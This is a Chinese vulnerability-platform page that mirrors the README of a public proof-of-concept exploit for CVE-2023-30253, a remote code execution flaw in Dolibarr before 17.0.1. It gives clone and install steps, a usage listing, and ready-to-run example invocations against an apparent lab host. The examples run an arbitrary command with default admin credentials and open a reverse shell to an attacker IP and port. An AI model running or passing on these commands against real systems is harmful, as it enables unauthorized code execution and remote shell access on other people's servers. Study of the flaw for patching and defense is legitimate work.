漏洞平台

POC详情： fb7574b53c5eb379a39102bdc99be6f5bb72da8b

来源

https://github.com/Rubikcuv5/cve-2023-30253

关联漏洞

标题： Dolibarr 操作系统命令注入漏洞 (CVE-2023-30253)
描述：Dolibarr是一个应用软件。一个现代软件包，可帮助管理您组织的活动。 Dolibarr 17.0.1之前版本存在安全漏洞，该漏洞源于可以通过大写操作远程执行代码。

描述

Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: <?PHP instead of <?php in injected data.

介绍

# CVE-2023-30253

<p align="center">
  <img src="https://github.com/Rubikcuv5/cve-2023-30253/assets/47946047/eee891a5-2641-48c5-95bf-1b0e42ded1ac" alt="image">
</p>

# Description
 Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: <?PHP instead of <?php in injected data.



## Documentation

- [CVE-2023-30253](https://cvefeed.io/vuln/detail/CVE-2023-30253)
- [GitHub Advisory: GHSA-9wqr-5jp4-mjmh](https://github.com/advisories/GHSA-9wqr-5jp4-mjmh)

## Setup
```
git clone https://github.com/Rubikcuv5/cve-2023-30253.git

pip3 install -r requirements.txt

python3 CVE-2023-30253.py -h
```

## USAGE
```
usage: CVE-2023-30253.py [-h] [--url URL] [-u USER] [-p PASSWORD] (-c COMMAND | -r ip port)

Argument parser

options:
  -h, --help            show this help message and exit
  --url URL             URL of the website
  -u USER, --user USER  Username
  -p PASSWORD, --password PASSWORD
                        Password
  -c COMMAND, --command COMMAND
                        Command to execute
  -r ip port, --reverseshell ip port
                        Reverse shell IP and port

```
## EXAMPLES POC

### Execute a command 
```
python3 CVE-2023-30253.py --url http://crm.board.htb -u admin -p admin -c "ls -l"
```

<p align="center">
  <img src="https://github.com/Rubikcuv5/cve-2023-30253/assets/47946047/25befa10-d52b-4f39-83cc-1398c7bb205e" alt="image">
</p>

### Getting a reverse shell
```
 python3 CVE-2023-30253.py --url http://crm.board.htb -u admin -p admin -r  10.10.14.17  4444
```
<p align="center">
  <img src="https://github.com/Rubikcuv5/cve-2023-30253/assets/47946047/56473ae8-901f-4eb3-ad8f-7794970c19ce" alt="image">
</p>


## Author

- [Rubickcuv](https://github.com/Rubikcuv5)

文件快照


 [4.0K]  /data/pocs/fb7574b53c5eb379a39102bdc99be6f5bb72da8b
├── [ 12K]  CVE-2023-30253.py
├── [1.7K]  README.md
└── [  98]  requirements.txt

0 directories, 3 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。